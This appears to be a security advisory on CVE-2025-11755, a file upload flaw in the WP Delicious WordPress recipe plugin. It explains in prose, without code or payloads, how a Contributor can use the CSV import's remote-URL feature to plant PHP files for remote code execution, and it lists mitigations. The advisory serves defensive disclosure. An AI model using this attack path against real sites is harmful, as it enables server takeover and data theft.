The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) WordPress plugin suffers from a critical vulnerability identified as CVE-2025-11755, categorized under CWE-434 (Unrestricted Upload of File with Dangerous Type). This vulnerability exists in the recipe import functionality, which allows users with at least Contributor-level permissions to import recipes via CSV files. The flaw permits an attacker to specify a remote URL during the import process, which the plugin then uses to upload files without proper validation or restriction on file types. Consequently, an attacker can upload arbitrary files, including malicious PHP scripts, leading to Remote Code Execution (RCE) on the hosting server. The vulnerability affects all plugin versions up to and including 1.9.0. The CVSS v3.1 base score is 8.8, indicating high severity, with attack vector as network (AV:N), low attack complexity (AC:L), requiring privileges (PR:L) but no user interaction (UI:N). The impact on confidentiality, integrity, and availability is high, as successful exploitation allows full control over the affected WordPress site and potentially the underlying server. No patches or updates are currently linked, and no known exploits have been reported in the wild as of the publication date (November 1, 2025). The vulnerability is particularly dangerous because Contributor-level users are common in WordPress environments, and the import feature is often used to bulk upload content, making it an attractive attack vector.

For European organizations, this vulnerability poses a significant risk to WordPress-based websites that utilize the WP Delicious plugin for recipe management. Successful exploitation can lead to full Remote Code Execution, allowing attackers to execute arbitrary commands, install backdoors, steal sensitive data, deface websites, or pivot to internal networks. This can result in data breaches, service disruptions, reputational damage, and compliance violations under regulations such as GDPR. Food bloggers, culinary businesses, and media companies using this plugin are particularly vulnerable. Given the ease of exploitation by users with Contributor privileges, insider threats or compromised contributor accounts could be leveraged to launch attacks. The lack of required user interaction increases the likelihood of automated exploitation attempts once the vulnerability becomes widely known. The impact extends beyond individual sites, as compromised servers can be used to distribute malware or conduct further attacks within European networks.

European organizations should take immediate steps to mitigate this vulnerability. First, restrict Contributor-level users from importing recipes until a secure patch or update is available. If possible, disable the CSV import feature in the plugin settings or remove the plugin entirely if not essential. Implement strict validation and sanitization of imported data, ensuring only safe file types are accepted and remote URLs are blocked or verified. Employ Web Application Firewalls (WAFs) with rules to detect and block suspicious file upload attempts targeting this plugin. Monitor logs for unusual import activity or file uploads. Limit Contributor permissions to trusted users only and enforce strong authentication mechanisms, including multi-factor authentication (MFA). Regularly back up WordPress sites and test restoration procedures. Stay updated with vendor advisories and apply patches promptly once released. Conduct security audits of WordPress environments to identify and remediate similar risks.